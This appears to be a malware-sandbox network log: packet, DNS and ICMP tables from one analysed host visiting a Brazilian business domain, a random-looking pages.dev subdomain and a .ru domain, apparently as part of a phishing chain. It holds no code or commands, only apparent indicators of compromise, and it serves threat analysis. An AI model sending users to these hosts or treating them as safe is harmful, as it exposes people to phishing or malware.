                                                                Aug 27, 2024 20:11:37.097434998 CEST49755443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:37.097505093 CEST44349755104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:37.097596884 CEST44349755104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:37.097773075 CEST49755443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:37.098304987 CEST49755443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:37.098320007 CEST44349755104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:46.943949938 CEST49756443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:46.943989992 CEST44349756104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:46.944149017 CEST49756443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:46.946332932 CEST49756443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:46.946346998 CEST44349756104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:47.426716089 CEST44349756104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:47.427026033 CEST49756443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:47.427041054 CEST44349756104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:47.427378893 CEST44349756104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:47.427922010 CEST49756443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:47.427922010 CEST49756443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:47.427938938 CEST44349756104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:47.427994967 CEST44349756104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:47.469645977 CEST49756443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:49.254534006 CEST44349756104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:49.254642010 CEST44349756104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:49.254714966 CEST49756443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:49.255417109 CEST49756443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:49.255440950 CEST44349756104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:49.258516073 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:49.258553982 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:49.258678913 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:49.258893013 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:49.258905888 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:49.747035980 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:49.747332096 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:49.747366905 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:49.747704029 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:49.748023987 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:49.748086929 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:49.748183966 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:49.792496920 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:50.230300903 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:50.230345964 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:50.230408907 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:50.230442047 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:50.231054068 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:50.231101036 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:50.231127024 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:50.231791019 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:50.231841087 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:50.231867075 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:50.231882095 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:50.231920958 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:50.232029915 CEST49757443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:50.232053041 CEST44349757104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:50.232646942 CEST4434974823.1.237.91192.168.2.5
                                                                Aug 27, 2024 20:11:50.232752085 CEST49748443192.168.2.523.1.237.91
                                                                Aug 27, 2024 20:11:59.728146076 CEST49758443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:59.728192091 CEST44349758104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:11:59.728307962 CEST49758443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:59.732675076 CEST49758443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:11:59.732690096 CEST44349758104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:00.839210987 CEST44349758104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:00.839576006 CEST49758443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:00.839601994 CEST44349758104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:00.839936018 CEST44349758104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:00.840351105 CEST49758443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:00.840415955 CEST44349758104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:00.840516090 CEST49758443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:00.888508081 CEST44349758104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:01.266752005 CEST49714443192.168.2.545.164.92.188
                                                                Aug 27, 2024 20:12:01.266768932 CEST4434971445.164.92.188192.168.2.5
                                                                Aug 27, 2024 20:12:01.712912083 CEST44349758104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:01.713001966 CEST44349758104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:01.713135958 CEST49758443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:01.713752031 CEST49758443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:01.713766098 CEST44349758104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:01.716831923 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:01.716859102 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:01.717119932 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:01.717365026 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:01.717377901 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.182636976 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.183027029 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:02.183046103 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.183387041 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.184024096 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:02.184096098 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.184320927 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:02.228502989 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.502438068 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.502496004 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.502526999 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.502562046 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.502568007 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:02.502585888 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.502618074 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.502628088 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:02.502685070 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:02.502688885 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.502708912 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:02.502752066 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:02.520500898 CEST49759443192.168.2.5104.21.51.138
                                                                Aug 27, 2024 20:12:02.520524025 CEST44349759104.21.51.138192.168.2.5
                                                                Aug 27, 2024 20:12:07.617871046 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:07.617906094 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:07.617975950 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:07.618319988 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:07.618331909 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.157471895 CEST49728443192.168.2.545.164.92.188
                                                                Aug 27, 2024 20:12:08.157489061 CEST4434972845.164.92.188192.168.2.5
                                                                Aug 27, 2024 20:12:08.406137943 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.406204939 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:08.416066885 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:08.416083097 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.416306973 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.431718111 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:08.476501942 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.743530989 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.743561029 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.743576050 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.743755102 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:08.743777990 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.743844032 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:08.744597912 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.744636059 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.744714975 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:08.744714975 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:08.744724035 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.745261908 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.745759964 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:08.749775887 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:08.749775887 CEST49760443192.168.2.540.68.123.157
                                                                Aug 27, 2024 20:12:08.749793053 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:08.749802113 CEST4434976040.68.123.157192.168.2.5
                                                                Aug 27, 2024 20:12:17.160793066 CEST49714443192.168.2.545.164.92.188
                                                                Aug 27, 2024 20:12:17.160906076 CEST4434971445.164.92.188192.168.2.5
                                                                Aug 27, 2024 20:12:17.160980940 CEST49714443192.168.2.545.164.92.188
                                                                Aug 27, 2024 20:12:18.815748930 CEST49762443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:12:18.815800905 CEST44349762108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:12:18.815876007 CEST49762443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:12:18.816329002 CEST49762443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:12:18.816346884 CEST44349762108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:12:19.476988077 CEST44349762108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:12:19.477286100 CEST49762443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:12:19.477317095 CEST44349762108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:12:19.477669954 CEST44349762108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:12:19.477972984 CEST49762443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:12:19.478039980 CEST44349762108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:12:19.531745911 CEST49762443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:12:20.754056931 CEST49763443192.168.2.5172.66.47.111
                                                                Aug 27, 2024 20:12:20.754108906 CEST44349763172.66.47.111192.168.2.5
                                                                Aug 27, 2024 20:12:20.754178047 CEST49763443192.168.2.5172.66.47.111
                                                                Aug 27, 2024 20:12:20.754621983 CEST49763443192.168.2.5172.66.47.111
                                                                Aug 27, 2024 20:12:20.754637957 CEST44349763172.66.47.111192.168.2.5
                                                                Aug 27, 2024 20:12:21.213112116 CEST44349763172.66.47.111192.168.2.5
                                                                Aug 27, 2024 20:12:21.213550091 CEST49763443192.168.2.5172.66.47.111
                                                                Aug 27, 2024 20:12:21.213577032 CEST44349763172.66.47.111192.168.2.5
                                                                Aug 27, 2024 20:12:21.213984013 CEST44349763172.66.47.111192.168.2.5
                                                                Aug 27, 2024 20:12:21.214286089 CEST49763443192.168.2.5172.66.47.111
                                                                Aug 27, 2024 20:12:21.214358091 CEST44349763172.66.47.111192.168.2.5
                                                                Aug 27, 2024 20:12:21.265616894 CEST49763443192.168.2.5172.66.47.111
                                                                Aug 27, 2024 20:12:23.159638882 CEST49728443192.168.2.545.164.92.188
                                                                Aug 27, 2024 20:12:23.159784079 CEST4434972845.164.92.188192.168.2.5
                                                                Aug 27, 2024 20:12:23.159878016 CEST49728443192.168.2.545.164.92.188
                                                                Aug 27, 2024 20:12:29.393589973 CEST44349762108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:12:29.393661976 CEST44349762108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:12:29.393709898 CEST49762443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:12:31.159152985 CEST49762443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:12:31.159178972 CEST44349762108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:12:36.119194031 CEST44349763172.66.47.111192.168.2.5
                                                                Aug 27, 2024 20:12:36.119282961 CEST44349763172.66.47.111192.168.2.5
                                                                Aug 27, 2024 20:12:36.119381905 CEST49763443192.168.2.5172.66.47.111
                                                                Aug 27, 2024 20:12:37.322547913 CEST49763443192.168.2.5172.66.47.111
                                                                Aug 27, 2024 20:12:37.322567940 CEST44349763172.66.47.111192.168.2.5
                                                                Aug 27, 2024 20:13:18.866755962 CEST49766443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:13:18.866803885 CEST44349766108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:13:18.866942883 CEST49766443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:13:18.867254019 CEST49766443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:13:18.867269993 CEST44349766108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:13:19.374793053 CEST44349766108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:13:19.375132084 CEST49766443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:13:19.375164032 CEST44349766108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:13:19.375510931 CEST44349766108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:13:19.375813961 CEST49766443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:13:19.375885010 CEST44349766108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:13:19.423491955 CEST49766443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:13:29.360124111 CEST44349766108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:13:29.360198021 CEST44349766108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:13:29.360337973 CEST49766443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:13:29.572577953 CEST49766443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:13:29.572611094 CEST44349766108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:14:18.924702883 CEST49767443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:14:18.924741983 CEST44349767108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:14:18.924868107 CEST49767443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:14:18.925178051 CEST49767443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:14:18.925192118 CEST44349767108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:14:19.414514065 CEST44349767108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:14:19.414983988 CEST49767443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:14:19.415014982 CEST44349767108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:14:19.415380955 CEST44349767108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:14:19.415754080 CEST49767443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:14:19.415823936 CEST44349767108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:14:19.470608950 CEST49767443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:14:29.324732065 CEST44349767108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:14:29.324810982 CEST44349767108.177.122.105192.168.2.5
                                                                Aug 27, 2024 20:14:29.324912071 CEST49767443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:14:29.338684082 CEST49767443192.168.2.5108.177.122.105
                                                                Aug 27, 2024 20:14:29.338704109 CEST44349767108.177.122.105192.168.2.5
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Aug 27, 2024 20:11:14.343467951 CEST53645901.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:14.413189888 CEST53566241.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:14.858037949 CEST4934053192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:14.858201981 CEST6066053192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:15.479280949 CEST53606601.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:15.479378939 CEST53493401.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:15.743875027 CEST53499741.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:16.937614918 CEST5377853192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:16.938271999 CEST5693953192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:16.944986105 CEST53569391.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:16.945131063 CEST53537781.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:16.956093073 CEST5268753192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:16.956501007 CEST6238853192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:17.565727949 CEST53526871.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:17.701039076 CEST5311453192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:17.701180935 CEST5839653192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:17.707998037 CEST53531141.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:17.708523989 CEST53583961.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:17.751219988 CEST53623881.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:18.752989054 CEST5776153192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:18.753189087 CEST5767953192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:18.759769917 CEST53577611.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:18.759783983 CEST53576791.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:18.862436056 CEST53550261.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:19.308093071 CEST6214253192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:19.308509111 CEST6191253192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:19.918312073 CEST53621421.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:20.106950998 CEST53619121.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:23.773238897 CEST5632353192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:23.773639917 CEST5384653192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:23.785391092 CEST53538461.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:23.786963940 CEST53563231.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:25.182926893 CEST5882453192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:25.183190107 CEST5373053192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:25.184108973 CEST5488853192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:25.184243917 CEST5161053192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:25.198117018 CEST53537301.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:25.198190928 CEST53588241.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:25.198853970 CEST53548881.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:25.199304104 CEST53516101.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:27.371356964 CEST4999353192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:27.371817112 CEST5351353192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:27.393598080 CEST53535131.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:27.393613100 CEST53499931.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:27.535821915 CEST6277553192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:27.536421061 CEST5946953192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:27.572891951 CEST53627751.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:27.572937012 CEST53594691.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:27.936345100 CEST6068553192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:27.936819077 CEST5200853192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:27.950750113 CEST53606851.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:27.956549883 CEST53520081.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:31.286835909 CEST5502753192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:31.287022114 CEST5886553192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:31.296940088 CEST53588651.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:31.299209118 CEST53550271.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:31.413264990 CEST5398953192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:31.413463116 CEST5567553192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:31.422625065 CEST53556751.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:31.423054934 CEST53539891.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:32.287389994 CEST6405553192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:32.287605047 CEST6033053192.168.2.51.1.1.1
                                                                Aug 27, 2024 20:11:32.294807911 CEST53640551.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:32.295258999 CEST53603301.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:33.193057060 CEST53610341.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:11:53.532507896 CEST53515131.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:12:14.059227943 CEST53634571.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:12:16.695470095 CEST53624931.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:12:43.055955887 CEST53586611.1.1.1192.168.2.5
                                                                Aug 27, 2024 20:13:29.581619024 CEST53526361.1.1.1192.168.2.5
                                                                TimestampSource IPDest IPChecksumCodeType
                                                                Aug 27, 2024 20:11:17.751282930 CEST192.168.2.51.1.1.1c24f(Port unreachable)Destination Unreachable
                                                                Aug 27, 2024 20:11:20.107026100 CEST192.168.2.51.1.1.1c24f(Port unreachable)Destination Unreachable
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Aug 27, 2024 20:11:14.858037949 CEST192.168.2.51.1.1.10xe90cStandard query (0)www.estampariaimagemeacao.com.brA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:14.858201981 CEST192.168.2.51.1.1.10x126cStandard query (0)www.estampariaimagemeacao.com.br65IN (0x0001)false
                                                                Aug 27, 2024 20:11:16.937614918 CEST192.168.2.51.1.1.10xfd81Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:16.938271999 CEST192.168.2.51.1.1.10x5e30Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:16.956093073 CEST192.168.2.51.1.1.10xfcbdStandard query (0)www.estampariaimagemeacao.com.brA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:16.956501007 CEST192.168.2.51.1.1.10xad5fStandard query (0)www.estampariaimagemeacao.com.br65IN (0x0001)false
                                                                Aug 27, 2024 20:11:17.701039076 CEST192.168.2.51.1.1.10xdb78Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:17.701180935 CEST192.168.2.51.1.1.10x5535Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:18.752989054 CEST192.168.2.51.1.1.10xb123Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:18.753189087 CEST192.168.2.51.1.1.10x967eStandard query (0)www.google.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:19.308093071 CEST192.168.2.51.1.1.10x5fcaStandard query (0)www.estampariaimagemeacao.com.brA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:19.308509111 CEST192.168.2.51.1.1.10x9e97Standard query (0)www.estampariaimagemeacao.com.br65IN (0x0001)false
                                                                Aug 27, 2024 20:11:23.773238897 CEST192.168.2.51.1.1.10x3bcfStandard query (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:23.773639917 CEST192.168.2.51.1.1.10xe338Standard query (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev65IN (0x0001)false
                                                                Aug 27, 2024 20:11:25.182926893 CEST192.168.2.51.1.1.10xba7cStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:25.183190107 CEST192.168.2.51.1.1.10x1b94Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:25.184108973 CEST192.168.2.51.1.1.10x15a4Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:25.184243917 CEST192.168.2.51.1.1.10x4da9Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.371356964 CEST192.168.2.51.1.1.10x863aStandard query (0)glansaolksnu.ruA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.371817112 CEST192.168.2.51.1.1.10x2cd4Standard query (0)glansaolksnu.ru65IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.535821915 CEST192.168.2.51.1.1.10x26e1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.536421061 CEST192.168.2.51.1.1.10x6ff9Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.936345100 CEST192.168.2.51.1.1.10x2030Standard query (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:27.936819077 CEST192.168.2.51.1.1.10xa73dStandard query (0)ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev65IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.286835909 CEST192.168.2.51.1.1.10x8fefStandard query (0)glansaolksnu.ruA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.287022114 CEST192.168.2.51.1.1.10xeaeStandard query (0)glansaolksnu.ru65IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.413264990 CEST192.168.2.51.1.1.10xa63Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:31.413463116 CEST192.168.2.51.1.1.10x4c3eStandard query (0)code.jquery.com65IN (0x0001)false
                                                                Aug 27, 2024 20:11:32.287389994 CEST192.168.2.51.1.1.10x2f16Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                Aug 27, 2024 20:11:32.287605047 CEST192.168.2.51.1.1.10xf3d5Standard query (0)code.jquery.com65IN (0x0001)false
